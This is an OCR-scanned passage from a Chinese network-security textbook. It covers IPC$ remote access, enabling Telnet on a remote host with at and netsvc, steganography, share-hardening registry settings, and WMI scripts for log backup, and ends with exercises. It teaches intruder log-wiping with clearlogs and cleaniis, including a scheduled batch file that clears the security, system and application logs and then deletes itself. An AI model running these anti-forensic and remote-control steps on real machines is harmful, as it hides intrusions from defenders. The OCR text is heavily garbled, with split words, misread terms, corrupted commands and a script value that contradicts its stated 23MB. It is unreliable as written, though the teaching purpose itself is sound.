码 的 情况 下 , IPC$ 才 能 建立 成 功 , IPC$ 空 连接 除外 。 远程 主机 需要 具备 的 条 件 是 : 开放 IPC$ 
共享 ; 运行 Server 服务 。 

(2) IPC$ 是 基于 账号 和 密码 的 ， 拥 有 远程 主机 管理 员 账 号 和 密码 能 成 功 建立 IPC$， 而 
且 拥有 相应 账号 的 权限 : 使 用 IPC$ 空 连接 虽然 能 与 远程 主机 建立 连接 ， 但 该 连接 没有 任何 
权限 ， 也 就 是 说 未 授权 者 不 能 通过 IPC$ 空 连接 控制 远程 主机 。 

(3) 与 远程 主机 建立 IPCS$ 成 功 ， 但 复制 文件 失败 。 如 果 是 用 管理 员 账号 与 远程 主机 建 
立 的 连接 而 不 是 IPC$ 空 连接 , 则 复制 失败 说 明 远 程 主机 关闭 了 C 盘 、D 盘 等 默认 共享 资源 ， 
这 时 候 可 以 用 计划 任务 开启 这 些 共享 资源 , 如 “at \192.168.1.60 15:30 net share Cpan=C:\”。 

(4) 一 些 常见 系统 错误 。 

错误 号 5 一 一 权限 不 足 ;， 错误 号 51 一 一 Windows 无 法 找到 网 络 路 径 ， 网 络 有 问题 ， 错 
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误 号 53 一 一 找 不 到 网 络 路 径 ，IP 地 址 错误 ， 目 标 没 开 机 ， 目 标 server 服务 未 启动 ， 目 标 有 
防火 墙 (端口 过 滤 ) 或 没有 了 PC$; 错误 号 67 一 一 找 不 到 网 络 名 ,用户 的 workstation 服务 未 启 
动 ， 目标 删除 了 IPC$; 错误 号 1219 一 一 提供 的 凭据 与 已 存在 的 凭据 起 冲突 ， 用 户 已 经 和 对 
方 建立 了 一 个 IPC$， 请 删除 后 再 连接 ; 错误 号 1326 一 一 未 知 的 用 户 名 或 错误 密码 ; 错误 号 
1792 一 一 试图 登录 ， 但 网 络 登录 服务 没 启动 ， 目 标 NetLogon 服务 未 启动 ; 错误 号 2242 一 一 此 
用 户 的 密码 已 过 期 ， 目 标 有 账号 策略 ， 强 制定 期 更 改 密码 。 


2. 远程 管理 计算 机 


必须 是 Administrator 组 的 成 员 才 能 完全 使 用 “计算 机 管理 ”， 否 则 没有 查看 或 修改 管 
理 属性 的 权限 ， 并 且 没 有 执行 管理 任务 的 权限 。 

1) ”远程 管理 

(1) 相关 知识 : Telnet 用 于 提供 远程 登录 服务 ， 当 终端 用 户 登录 到 提供 这 种 服务 的 主 
机 时 ， 就 会 得 到 一 个 Shell( 命 令 行 )， 通 过 这 个 Shell， 终 端 用 户 可 以 执行 远程 主机 上 的 任何 
程序 ;同时 用 户 将 作为 这 台 主 机 的 终端 来 使 用 该 主机 的 CPU 和 内 存 资 源 ， 实 现 完全 控制 远 
程 主机 ，Telnet 登录 控制 是 入 侵 者 常用 的 一 种 方式 。 

Telnet 命令 : 


telnet IP [Port] 一 一 默认 端口 为 23 


(2) 实例 : 开启 远程 计算 机 “计划 任务 ”和 “Telnet” 服 务 。 步 又 如 下 。 

@ 建立 IPC$ 连 接 ， 还 是 以 192.168.1.60 为 例 ， 过 程 略 。 

@ 管理 远程 计算 机 。 

打开 “计算 机 管理 ”界面 ， 在 界面 中 选择 “操作 (A)” 一 “连接 到 另 一 台 计 算 机 (c)” 
选项 , 在 弹出 的 “选择 计算 机 ”窗口 中 的 “名 称 ”文本 框 中 填 入 目标 主机 IP“192.168.1.60”， 
然后 单 击 “ 确 定 ” 按 钮 显示 界面 。 

上 述 过 程 中 如 果 出 现 “ 输 入 用 户 名 和 密码 ”， 就 需要 再 次 输入 用 户 名 和 密码 ， 该 用 户 
名 和 密码 可 以 与 建立 IPC$ 连 接 时 使 用 的 相同 ， 也 可 以 不 同 ， 这 都 不 会 影响 以 后 的 操作 ， 但 
这 个 用 户 一 定 要 拥有 管理 员 权限 。 

图 开启 “计划 任务 ”服务 。 

在 “计算 机 管理 ”界面 ， 单 击 “ 服 务 和 应 用 程序 ”前 面 的 “+” 号 展开 项 目 ， 然 后 在 展 
开 的 项 目 中 选择 “服务 ”选项 ， 右 侧 出 现 的 列表 即 是 远程 计算 机 的 服务 列表 ， 在 “名 称 ” 
中 找到 Task Scheduler， 在 其 上 双击 打开 设置 对 话 框 。 在 “Task Scheduler 的 属性 ”窗口 中 ， 
把 “启动 类 型 ” 选择 为 “自动 ”， 然 后 在 “服务 状态 ”中 单 击 “ 启 动 ” 来 启动 Task Scheduler 
服务 ， 这 样 设置 后 ， 该 服务 会 在 每 次 开机 时 自动 启动 。 

@ 开启 Telnet 服务 。 

在 服务 列表 中 找到 Telnet， 在 其 上 双击 打开 “Telnet 服务 的 属性 ”窗口 ， 按 照 前 面 所 讲 
的 方法 把 该 服务 启动 类 型 设置 为 “自动 ”， 将 服务 状态 设置 为 “已 启动 ”。 

加 断 开 连 接 。 

关闭 “计算 机 管理 ”界面 后 ， 还 需要 手工 输入 命令 “netuse* /del” 来 断 开 IPC$ 连 接 。 

2) 查看 信息 

(1) 日 志 : “系统 工具 ”下 的 “事件 查看 器 ”用 来 查看 “应 用 程序 ”、“ 安 全 性 ”、 
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“系统 ”这 三 个 方面 的 日 志 。 应 用 程序 日 志 包 含 由 应 用 程序 或 系统 程序 记录 的 事件 。 例如， 
数据 库 程序 可 在 应 用 程序 日 志 中 记录 文件 错误 ， 而 程序 员 决 定 记录 哪 一 个 事件 。 系 统 日 志 
包含 Windows 系统 组 件 记录 的 事件 。 例如， 在 启动 过 程 中 将 加 载 的 驱动 程序 或 其 他 系统 组 
件 的 失败 信息 记录 在 系统 日 志 中 。 安 全 性 日 志 可 以 记录 安全 事件 ， 如 有 效 的 和 无 效 的 登录 
尝试 ， 以 及 与 创建 、 打 开 或 删除 文件 等 资源 使 用 相关 联 的 事件 。 管 理 器 可 以 指定 在 安全 日 
志 中 记录 什么 事件 。 例 如 ， 如 果 已 启用 登录 审核 ， 登 录 系统 的 尝试 将 记录 在 安全 日 志 里 。 

(2) 共享 信息 及 共享 会 话 : 通过 “计算 机 管理 ”可 以 查看 该 机 器 的 共享 信息 和 共享 会 
话 (IPC$ 也 属于 这 种 会 话 )。 在 “共享 ”中 可 以 查看 该 机 器 开放 的 共享 资源 ， 除 了 查看 共享 
资源 外 ， 还 可 通过 此 处 来 建立 共享 ;管理 员 也 可 以 通过 “会 话 ” 来 查看 计算 机 是 否 与 远程 
主机 存在 IPC$ 连 接 , 借 此 获取 入 侵 者 的 他 地 址 (就 在 “系统 工具 ”一 “共享 文件 夹 ” 一 “会 
话 ” 下 查看 )。 

(3) 用 户 和 组 : 可 以 通过 “计算 机 管理 ”查看 远程 主机 用 户 和 组 的 信息 ， 不 过 不 能 在 
这 里 执行 “新 建 用 户 ” 和 “删除 用 户 ” 操 作 。 

3) ”开启 远程 主机 服务 的 其 他 办 法 

(1) 通过 “BAT 文件 ”和 “计划 任务 服务 ”开启 远程 主机 服务 的 操作 步骤 如 下 。 

@ 编写 BAT 文件 ， 内 容 为 “net start telnet”， 另 存 为 tel.bat。 

@ 建立 IPC$ 连 接 ， 把 tel.bat 文件 复制 到 远程 主机 。 

@@ 使 用 “nettime 目标 了 P” 查 看 远程 主机 系统 时 间 , 然后 用 “at\ 目 标 了 P 计划 time 命 
令 ” 建 立 计 划 任 务 。 

需要 注意 的 是 ， 如 果 远程 主机 禁用 了 Telnet 服务 ， 这 种 方法 将 失败 。 

(2) 使 用 工具 netsvc.exe 开启 远程 主机 服务 。 

netsvc 是 微软 公司 NT 系统 中 附带 的 一 个 管理 工具 , 用 于 开启 远程 主机 上 的 服务 , 这 种 
方法 不 需要 通过 远程 主机 的 “计划 任务 服务 ”。 

命令 格式 : 


netsvc \\IP SVC /START 


其 中 下 为 目标 主机 屯 ，SVC 为 预 开启 的 服务 名 ，/START 表示 开启 服务 。 
例子 : 


netsvc \\192.168.1.60 telnet /start 开启 远程 主机 的 telnet 服务 


4) 常见 问题 

(1) 使 用 “计算 机 管理 ”与 远程 主机 连接 失败 的 原因 : 没有 获取 远程 主机 的 管理 员 账 
号 和 密码 ;目标 主机 禁用 了 server 服务 ;错误 的 他 地 址 ， 目 标 主 机 不 是 WinNT/2000/XP/ 
2003 操作 系统 。 

(2) 有 时 候 使 用 “计算 机 管理 ”与 远程 主机 建立 连接 ， 但 无 法 查看 该 主机 上 的 “本 地 
用 户 和 组 ”， 这 是 正常 的 ， 可 以 采用 其 他 方法 查看 ， 这 里 不 再 详 述 。 

(3) 使 用 “计算 机 管理 ”与 远程 主机 建立 连接 ， 开 启 “Telnet 服务 ” 均 成 功 ， 但 无 法 
登录 远程 主机 ， 这 是 由 于 微软 为 了 增加 Telnet 服务 的 安全 性 而 添加 的 一 项 NTLM 验证 , 正 
是 这 个 验证 导致 非 授权 主机 的 Telnet 登录 失败 。 
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2.4.4 ”信息 隐藏 技术 


Information Hiding( 信 息 隐藏 ) 技 术 将 来 ， 会 在 保护 网 络 中 的 信息 不 受 破坏 方面 起 到 
重要 作用 ， 信 息 隐 藏 是 把 机 密 信息 隐藏 在 大 量 信息 中 从 而 不 让 对 手 发 觉 的 一 种 方法 。 信 息 
隐藏 的 方法 主要 有 隐 写 术 、 数 字 水 印 技 术 、 可 视 密码 技术 、 潜 信道 、 隐 匿 协议 等 五 种 。 

下 面 将 重点 介绍 隐 写 术 、 数 字 水 印 技术 和 可 视 密码 技术 。 

1)” 隐 写 术 (Steganography) 

隐 写 术 就 是 将 秘密 信息 隐藏 到 看 上 去 普通 的 信息 (如 数字 图 像 ) 中 进行 传送 。 现 有 的 隐 
写 术 方法 主要 有 : 利用 高 空间 频率 的 图 像 数据 隐藏 信息 、 采 用 最 低 有 效 位 方法 将 信息 隐藏 
到 宿主 信号 中 、 使 用 信号 的 色 度 隐藏 信息 、 在 数字 图 像 的 像素 亮度 的 统计 模型 上 隐藏 信息 、 
Patchwork 方法 等 。 当 前 很 多 隐 写 方法 都 是 基于 文本 及 其 语言 的 隐 写 术 , 如 基于 同义词 替换 
的 文本 隐 写 术 ，an efficient linguistic steganography for chinese text 一 文 就 描述 了 采用 中 文 的 
同义词 替换 的 算法 。 其 他 的 文本 隐 写 术 有 基于 文本 格式 隐 写 术 等 。 

2) ”数字 水 印 技术 (Digital Watermark) 

该 技术 是 将 一 些 标识 信息 ( 即 数字 水 印 ) 直 接 嵌 入 数字 载体 (包括 多 媒体 、 文 档 、 软 件 等 ) 
当中 ， 但 不 影响 原 载体 的 使 用 价值 ， 也 不 容易 被 人 的 感知 系统 (如 视觉 或 听觉 系统 ) 觉 察 或 
注意 到 。 目 前 主要 有 两 类 数字 水 印 : 一 类 是 空间 数字 水 印 ， 另 一 类 是 频率 数字 水 印 。 空 间 
数字 水 印 的 典型 代表 是 最 低 有 效 位 (LSB) 算 法 , 其 原理 是 通过 修改 表示 数字 图 像 的 颜色 或 颜 
色 分 量 的 位 平面 ， 调 整数 字 图 像 中 感知 不 重要 的 像素 来 表达 水 印 的 信息 ， 以 达到 嵌入 水 印 
的 目的 。 频 率 数字 水 印 的 典型 代表 是 扩展 频谱 算法 ， 其 原理 是 通过 时 频 分 析 ， 根 据 扩 展 频 
谱 特 性 ， 在 数字 图 像 的 频率 域 上 选择 那些 对 视觉 最 敏感 的 部 分 ， 使 修改 后 的 系数 隐 含 数字 
水 印 的 信息 。 

3) “可 视 密码 技术 

可 视 密码 技术 是 Naor 和 Shamir 于 1994 年 首次 提出 的 , 其 主要 特点 是 恢复 秘密 图 像 时 
不 需要 任何 复杂 的 密码 学 计算 ， 而 是 以 人 的 视觉 即 可 将 秘密 图 像 辨 别 出 来 。 其 做 法 是 产生 
n 张 不 具有 任何 意义 的 胶片 , 任 取 其 中 t 张 胶片 倒 合 在 一 起 即 可 还 原 出 隐藏 在 其 中 的 秘密 信 
息 。 其 后 ， 人 们 又 对 该 方案 进行 了 改进 和 发 展 。 主 要 的 改进 办 法 有 : 使 产生 的 n 张 胶片 都 
有 一 定 的 意义 ， 这 样 做 更 具有 迷惑 性 ， 改 进 了 相关 集合 的 方法 ， 将 针对 黑白 图 像 的 可 视 秘 
密 共享 扩展 到 基于 灰 度 和 彩色 图 像 的 可 视 秘密 共享 中 。 


2.4.5 ”安全 解决 方案 


为 阻止 入 侵 者 利用 IPC$ 入 侵 ， 有 如 下 工作 要 做 。 

1. 删除 默认 共享 

(1) 首先 了 解 本 机 共享 资源 ， 在 cmd 窗口 输入 net share 命令 。 
(2) 删除 共享 资源 。 

方法 一 : 通过 BAT 文件 执行 删除 共享 资源 命令 。 

首先 建立 BAT 文件 (如 noshare bab， 输 入 如 下 内 容 。 
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net share ipc$ /del 
net share admin$ /del 
net share C$ /del 
net share D$ /del 


如 果 有 其 他 盘 符 ， 可 以 继续 添加 。 然 后 保存 该 文件 后 ， 复 制 到 本 机 “开始 ”一 “程序 ” 
一 “启动 ”中 ， 以 后 每 次 开机 都 会 自动 执行 该 BAT 文件 来 删除 默认 共享 。 如 果 以 后 需要 使 
用 共享 资源 ， 可 以 使 用 “net share 共享 名 ”命令 来 打开 。 

方法 二 : 通过 修改 注册 表 来 删除 默认 共享 。 

打开 注册 表 ， 按 不 同 操作 系统 进行 如 下 不 同 修改 。 


Windows 2003 server 版: 

Key:HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver 
\parameters 

新 建 Name:Autoshareserver 

Type:DWORD ( 双 字 节 ) 

Value:0 

Windows 2003 station 版 : 

Key:HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver 
\parameters 

新 建 Name:AutoshareWks 

Type:DWORD ( 双 字 节 ) 

Value:0 


建立 后 重启 ， 默 认 共 享 即 被 删除 。 如 需要 使 用 共享 资源 ， 删 除 刚才 建立 的 键 值 ， 重 启 
即 可 生效 。 

2. 禁止 空 连接 进行 枚 举 攻击 的 方法 

有 了 IPC$ 空 连接 作为 连接 基础 ， 入 侵 者 可 以 进行 反复 的 试探 性 连接 ， 直 到 连接 成 功 、 
获取 密码 ， 这 就 为 入 侵 者 暴力 破解 提供 了 可 能 性 ， 被 入 侵 只 是 时 间 问 题 。 为 了 解决 这 个 问 
题 ， 打 开 注 册 表 编辑 器 ， 在 HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\ 
Control\LSA 中 把 Restrict Anonymous=DWORD 的 键 值 改 为 00000001( 也 可 以 改 为 2， 不 过 
改 为 2 后 可 能 会 造成 一 些 服务 不 能 正常 工作 )。 修 改 完毕 重启 计算 机 ， 这 样 便 禁止 了 空 链接 
进行 枚 举 攻击 。 要 说 明 的 是 ， 这 种 方法 并 不 能 禁止 建立 空 链接 。 现 在 再 使 用 X-Scan 对 计算 
机 进行 安全 检测 ， 便 会 发 现 该 主机 不 再 泄露 用 户 列表 和 共享 列表 ， 操 作 系统 类 型 也 不 会 被 
X-Scan 识别 。 


3. 关闭 Server 服务 


Server 服务 是 IPC$ 和 默认 共享 所 依赖 的 服务 , 如 果 关闭 它 , IPC$ 和 默认 共享 便 不 存在 ， 
但 同时 也 使 服务 器 丧失 其 他 一 些 服务 功能 ， 因 此 该 方法 不 适合 服务 器 使 用 ， 只 适合 个 人 计 
算 机 使 用 。 
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选择 “控制 面板 ”一 “管理 工具 ”一 “服务 ”选项 打开 服务 管理 器 ， 在 服务 列表 中 找 
到 Server 服务 ， 单 击 鼠 标 右键 ， 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 打开 “Server 的 属 
性 ”窗口 ， 然 后 在 该 窗口 中 的 “启动 类 型 ”下 拉 列 表 中 选择 “已 禁用 ”选项 ， 重 启 生效 。 
还 可 使 用 Dos 命令 “net stop server/y” 来 关闭 , 但 只 能 当前 生效 一 次 , 计算 机 重启 后 , Server 
服务 还 是 会 自动 开启 。 


2.5 留 后 门 与 清 痕 迹 的 防范 方法 


黑客 除了 通过 克隆 账号 留 后 门 外 ， 还 要 清除 入 侵 痕 迹 ， 主 要 是 清除 系统 日 志 。 

Windows 系统 以 三 种 日 志方 式 记录 重要 事件 。 

(1) 应 用 程序 日 志 ， 包 含 由 应 用 程序 或 系统 程序 记录 的 事件 。 例 如 : 数据 库 程序 可 在 
应 用 日 志 中 记录 文件 错误 ; 程序 开发 人 员 决 定 记 录 哪 一 个 事件 。 

(2) 系统 日 志 ， 包 含 Windows 系统 组 件 记录 的 事件 。 例 如 : 在 启动 过 程 中 将 加 载 的 驱 
动 程序 或 其 他 系统 组 件 的 失败 信息 记录 在 系统 日 志 中 。 

(3) 安全 日 志 ， 可 以 记录 安全 事件 ， 如 有 效 的 和 无 效 的 登录 尝试 ， 以 及 与 创建 、 打 开 
或 删除 文件 等 资源 使 用 相关 联 的 事件 。 

下 面 介 绍 几 种 清除 日 志 的 黑客 工具 。 


1. 清除 系统 日 志 工 具 一 一 clearlog.exe 
使 用 方法 : 


Usage: clearlogs [\computername] <-app / -sec / -sys> 
-app ”应 用 程序 日 志 

-sec ”安全 日 志 

-sys ”系统 日 志 


1) ”清除 远程 计算 机 日 志 

先 用 ipc 连接 net use \ipipc$， 输 入 密码 /user 用 户 名 ， 然 后 开始 清除 。 
方法 : 

clearlogs \ip -app 清除 远程 计算 机 的 应 用 程序 日 志 

clearlogs \ip -sec 清除 远程 计算 机 的 安全 日 志 

clearlogs \ip -sys 清除 远程 计算 机 的 系统 日 志 


2) ”清除 本 机 日 志 

如 果 和 远程 计算 机 不 能 建立 空 连接 , 则 需要 把 这 个 工具 传 到 远程 计算 机 上 , 然后 清除 。 
方法 ; 

clearlogs -app 清除 远程 计算 机 的 应 用 程序 日 志 

clearlogs -sec 清除 远程 计算 机 的 安全 日 志 

clearlogs -sys 清除 远程 计算 机 的 系统 日 志 


为 了 更 安全 一 点 ， 可 以 建立 一 个 批 处 理 文件 ， 用 at 命令 建立 一 个 计划 任务 ， 让 其 自动 
运行 ， 达 到 自动 清除 的 目的 。 
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例如 建立 一 个 c.bat: 


rem = 一 一 = 一 一 一 开始 
echo off 


clearlogs -app 
clearlogs -sec 
clearlogs -sys 
del clearlogs.exe 
del c.bat 


exit 


在 用 户 的 计算 机 上 测试 的 时 候 ， 不 用 @echo off， 也 可 以 看 到 结果 。 
第 一 行 表示 : 运行 时 不 显示 窗口 。 

第 二 行 表示 : 清除 应 用 程序 日 志 。 

第 三 行 表示 : 清除 安全 日 志 。 

第 四 行 表示 : 清除 系统 日 志 。 

第 五 行 表示 : 删除 clearlogs.exe 这 个 工具 。 

第 六 行 表 示 : 删除 c.bat 这 个 批 处 理 文件 。 

第 七 行 表示 : 退出 。 

用 at 命令 ， 建 立 一 个 计划 任务 。 

如 : at 21:00 c:c-bat， 则 可 在 晚 9 点 自动 运行 ， 并 自动 清除 系统 日 志 。 
2. 清除 iis 日 志 工具 一 一 cleaniis.exe 

使 用 方法 : 

iisantidote <logfile dir> <ip or string to hide> 
iisantidote <logfile dir><ip or string to hide> stop 

stop option will stop iis before clearing the files and restart it after 


<logfile dir> exemple : c:winntsystem32logfilesw3svcl dont forget the 


使 用 说 明 ， 例 如 : 

cleaniis c:winntsystem32logfilesw3svcl 192.168.0.1 表示 清除 log 中 所 有 此 IP(192.168.0.1) 
地 址 的 访问 记录 。 

cleaniis c:winntsystem32logfilesw3svcl/shop/admin/ 表示 清除 这 个 目录 里 面 所 有 的 日 志 。 

c:winntsystem32logfilesw3svcl ”代表 是 iis 日 志 的 位 置 (Windows NT/2000), 这 个 路 径 可 
以 改变 。 

c:windowssystem32logfilesw3svcl ”代表 是 iis 日 志 的 位 置 (Windows XP/2003)， 这 个 路 
径 也 可 以 改变 。 

同样 这 个 也 可 以 建立 批 处 理 ， 方 法 与 清除 系统 日 志 的 方法 相同 。 
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3. 清除 历史 记录 及 运行 日 志 的 工具 一 一 cleaner.exe 

这 个 工具 直接 运行 就 可 以 。 

对 于 网 络 用 户 而 言 ， 及 时 发 现 漏洞 和 入 侵 是 网 络 安全 防护 的 首要 任务 。 但 是 黑客 一 旦 
清除 了 日 志文 件 ， 对 于 一 般 网 络 用 户 而 言 是 难以 发 现 的 ， 因 此 建议 采取 以 下 策略 提高 网 络 
的 自主 防护 能 力 。 

(1) 保护 本 地 安全 策略 。 

@ 系统 关闭 时 删除 所 有 临时 文件 ， 启 动 时 利用 杀毒 软件 检查 重要 的 系统 文件 。 

@ ”实施 用 户 账户 封锁 策略 。 

@ 正确 配置 用 户 权 限 将 阻止 恶意 系统 用 户 访问 其 他 用 户 文件 。 

(2) 保护 系统 文件 和 目录 权限 ， 可 以 有 效 地 保护 日 志文 件 ， 从 而 使 未 授权 用 户 不 能 访 
问 这 些 文件 夹 。 

(3) 限制 空 连接 ， 保 护 共享 文件 ， 可 以 通过 启用 防火 墙 监视 网 络 连接 情况 。 

(4) 禁用 不 必要 的 服务 。 


小 结 


本 章 主 要 介绍 了 黑客 的 由 来 、 黑 客 行为 的 发 展 趋势 ， 系统 介绍 了 黑客 攻击 事件 的 分 类 ， 
全 面 介绍 了 黑客 攻击 常用 的 手段 。 通 过 本 章 的 学 习 ， 学 生 可 以 了 解 有 关 黑 客 的 相关 知识 
掌握 常用 的 网 络 攻击 与 防范 的 方法 ， 同 时 提高 网 络 安全 意识 ， 并 自觉 维护 网 络 安全 。 


本 章 实 训 
实 训 日 志 的 防护 


1. 实验 目的 


通过 日 志 的 管理 ， 熟 悉 如 何 通过 日 志 了 解 到 系统 的 安全 性 能 ， 了 解 黑客 在 入 侵 成 功 后 
清除 日 志 的 方法 。 


2. 实验 内 容 


(1) 日 志 的 安全 配置 。 
(2) 日 志 的 查询 与 备份 。 


3. 实验 步骤 


1) 日 志 的 安全 配置 

默认 条 件 下 , 日 志 的 大 小 为 512KB， 如 果 超 出 则 会 报错 ， 并 且 不 会 再 记录 任何 日 志 。 
所 以 首要 任务 是 更 改 默 认 大 小 。 

更 改 默认 大 小 的 具体 方法 :注册 表 中 HKEY _ LOCAL MACHINE\System\CurentControlSet\ 
Services\Eventlog 对 应 的 每 个 日 志 如 系统 、 安 全 、 应 用 程序 等 均 有 一 个 maxsize 子 键 ， 修 改 
即 可 。 

下 面 给 出 来 自 微软 站 点 的 一 个 脚本 ， 利 用 VMI 来 设 定 日 志 最 大 为 23MB， 并 允许 日 志 
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自行 覆盖 14 天 前 的 日 志 。 该 脚本 利用 的 是 WMI 对 象 ，WMI(Windows Management 
Instrumentation) 技 术 是 微软 提供 的 Windows 下 的 系统 管理 工具 。 通 过 该 工具 可 以 获得 本 地 
或 管理 客户 端 系统 中 几乎 全 部 信息 。 很 多 专业 的 网 络 管理 工具 都 是 基于 WMI 开发 的 。 该 
工具 在 Windows 2000 以 及 Windows NT 下 是 标准 工具 。 以 下 代码 在 Windows 系统 均 可 
运行 。 
strComputer = "." 
Set objWMIService = GetObject ("winmgmts:" _ 
& "{impersonationLevel=impersonate, (Security)}!\\" & _ 
strComputer & "\root\cimv2") "获得 VMI 对 象 
Set colLogFiles = objWMIService.ExecQuery _ 
("Select * from Win32 NTEventLogFile") 
For each objLogfile in colLogFiles 
strLogFileName = objLogfile.Name 
Set wmiSWbemObject = GetObject _ 
("winmgmts: {impersonationLevel=Impersonate}!\\.\root\cimv2:" _ 
& "Win32 NTEventlogFile.Name="'" & strLogFileName & "'") 
wmiSWbemObject .MaxFileSize = 2500000000 
wmiSWbemObject .OverwriteOutdated = 14 
wmisWbemObject.Put_ 
Next 


将 上 述 脚 本 用 记事 本 保存 为 后 级 名 为 vbs 的 文件 即 可 使 用 。 

另外 需要 说 明 的 是 ， 代 码 中 的 strComputer="." 在 Windows 脚本 中 的 含义 相当 于 
localhost， 如 果 要 在 远程 主机 上 执行 代码 ， 只 需要 把 "." 改 动 为 主机 名 ， 当 然 首先 得 拥有 对 
方 主机 的 管理 员 权 限 并 建立 IPC 连接 ,本 文中 的 代码 所 出 现 的 strComputer 均 可 作 如 此 改动 。 

2) 日 志 的 查询 与 备份 

一 个 优秀 的 管理 员 应 该 养 成 备份 日 志 的 习惯 ， 如 果 有 条 件 的 话 ， 还 应 该 把 日 志 转 存 到 
备份 机 器 上 或 直接 转 储 到 打印 机 上 , 在 这 里 推荐 微软 的 resourceKit 工具 箱 中 的 dumpel.exe。 

使 用 方法 : 

dumpel -f filename -s \\server -1 log 

-£ filename 输出 日 志 的 位 置 和 文件 名 

-s \\server 输出 远程 计算 机 日 志 

Ess + 1og 是 system，security，application， 也 可 为 DNS 等 。 


如 要 把 目标 服务 器 server 上 的 系统 日 志 转 存 为 backupsystem .log， 可 以 用 以 下 格式 : 
dumpel \\server -1 system -f backupsystem.1og 

再 利用 计划 任务 实现 定期 备份 系统 日 志 。 

另外 利用 脚本 编程 的 VMI 对 象 也 能 轻而易举 地 实现 日 志 备份 。 
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下 面 给 出 备份 application 日 志 的 代码 : 


backuplog.vbs 
strComputer = "." 
Set objWMIService = GetObject ("winmgmts:™ 
& "{impersonationLevel=impersonate, (Backup)}!'\\" & _ 
strComputer & "\root\cimv2") "获得 VMI 对 象 
Set colLogFiles = objWMIService.ExecQuery 
("Select * from Win32 NTEventLogFile where 
LogFileName='Application'") “' 获 取 日 志 对 象 中 的 应 用 程序 日 志 
For Each objLogfile in colLogFiles 
errBackupLog= objLogFile.BackupEventLog("f:\application.evt") ' 将 日 
志 备 份 为 f: \application.evt 
If errBackupLog <> 0 Then Wscript.Echo "The Application event log could not 
be backed up." 
else Wscript.Echo "success backup log" 
End If 
Next 
程序 说 明 : 如 果 备 份 成 功 , 窗口 提示 为 “success backup log”, 否则 提示 “The Application 
event log could not be backed up”， 此 处 备份 的 日 志 名 为 application， 备 份 位 置 为 
fapplication.evt， 可 以 自行 修改 ， 此 处 备份 的 格式 为 evt 的 原始 格式 ， 用 记事 本 打开 则 为 
乱码 。 


本 章 习 题 


一 、 选 择 题 

1. 在 Apache 服 务 器 配置 过 程 中 ,在 Httpd.conf 文 件 中 的 某 行 前 加 # 意 味 着 这 行 (  )。 
A. 不 显示 B. 不 执行 
C. 不 首先 执行 D. 无 意思 


2.” 对 入 侵 检测 设备 的 作用 认识 比较 全 面 的 是 (  )。 
A. 只 要 有 IDS 网 络 就 安全 了 
B. 只 要 有 配置 好 的 IDS 网 络 就 安全 了 
C.IDS 一 无 是 处 
D. IDS 不 能 百分之百 地 解决 所 有 问题 
3. 以 下 不 是 漏洞 扫描 的 主要 任务 的 是 ( ). 
A. 查看 错误 配置 B. 弱 口 令 检 测 
C. 发 现 网 络 攻击 D. 发 现 软件 安全 漏洞 
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4. 我们 在 使 用 Honeynet 技术 过 程 中 要 着 重 保护 ( 法 


A. 设备 B. 网 络 
C. 系统 日 志 D. 数据 
5. 如 果 要 使 sniffer 能 够 正常 抓 取 数 据 ， 一 个 重要 的 前 提 是 网 卡 要 设置 成 (  ) 模 式 。 
A. 广播 B. 共享 
C. 混杂 D. 交换 
6. DNS 欺骗 主要 是 利用 了 DNS 的 ( ” ”) 功 能 
A. 解析 查询 B. 递归 查询 
C. 条 件 查 询 D. 循环 查询 


7. 缓存 区 溢出 和 格式 化 字符 串 攻 击 主要 是 由 于 ( ”) 原 因 造 成 的 。 
A. 被 攻击 平台 主机 档次 较 差 
B. 分 布 式 DOS 攻击 造成 系统 资源 耗 尽 
C. 被 攻击 系统 没有 安装 必要 的 网 络 设备 
D. 由 于 编程 人 员 在 编写 程序 过 程 中 书写 不 规范 造成 的 
8. ”对 于 查 杀 病毒 ， 下 列 做 法 欠 受 的 是 ( 。 )。 
A. 升级 杀毒 软件 的 版 本 
B. 加 装 多 个 杀毒 软件 
C. 进行 系统 格式 化 
D. 在 DOS 下 查 杀 病 毒 


二 、 填 空 题 


1. 目前 入 侵 检 测 器 与 分 析 器 之 间 的 通信 有 两 种 方式 : 和 
2. 在 缓存 区 溢出 攻击 中 ， 修 改 程序 流 的 方法 有 


3. 目前 前 流行 的 林 马 传播 方式 有 

4. 在 正常 情况 下 ， 网 卡 只 响应 两 种 天 型 的 效 据 由 
和 

扫描 是 通过 向 目标 主机 发 送 数据 报 文 ， 然 后 根据 响应 获得 目标 主机 的 情况 ， 常 见 
的 扫描 类 型 有 

6. 我 们 常用 的 防止 ARP 次 肪 的 方法 有 
和 等 这 几 种 。 
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第 3 章 拒绝 服务 与 数据 库 安 全 


【本 章 要 点 】 


本 章 主要 介绍 常见 的 攻击 类 型 一 -拒绝 服务 攻击 以 及 数据 库 安全 方面 的 相关 内 容 .通过 
本 章 的 学 习 ， 可 以 掌握 拒绝 服务 攻击 的 概念 及 原理 、 常 见 的 DoS 攻击 种 类 及 防护 、 基 于 漏 
洞 入 侵 的 防护 方法 、SQL 数据 库 安全 原理 及 SQL Server 攻击 的 防护 等 相关 内 容 。 


3.1 拒绝 服务 攻击 概述 


随 着 互联 网 络 带宽 的 增加 和 多 种 DoS 黑客 工具 的 不 断 发 布 ， DoS 拒绝 服务 攻击 的 实施 
越 来 越 容易 ，DoS 攻击 事件 正在 呈 上 升 趋势 。 出 于 商业 竞争 、 打 击 报复 和 网 络 敲 诈 等 多 种 
因素 ， 导 致 很 多 IDC 托管 机 房 、 商 业 站 点 、 游 戏 服务 器 和 聊天 网 络 等 网 络 服务 商 长 期 以 来 
一 直 被 Dos 攻击 所 困扰 ， 随 之 而 来 的 是 客户 投诉 、 同 虚拟 主机 用 户 受 牵连 、 法 律 纠 纷 和 商 
业 损 失 等 一 系列 问题 ， 因 此 ， 解 决 Dos 攻击 的 问题 成 为 网 络 服 务 商 必须 考虑 的 事情 。 


3.1.1 DoS 定义 


拒绝 服务 攻击 ， 英 文 为 “Denial of Service”， 也 就 是 我 们 常 说 的 DoS。DoS 是 借助 
网 络 服务 器 的 安全 漏洞 实现 破坏 该 服务 器 的 正常 运行 , 利用 虚假 瑟 地 址 周期 性 地 向 网 络 服 
务 器 发 出 正常 的 服务 请 求 ， 进 而 过 量 占用 系统 的 服务 资源 ， 最 终 导致 合法 的 网 络 用 户 无 法 
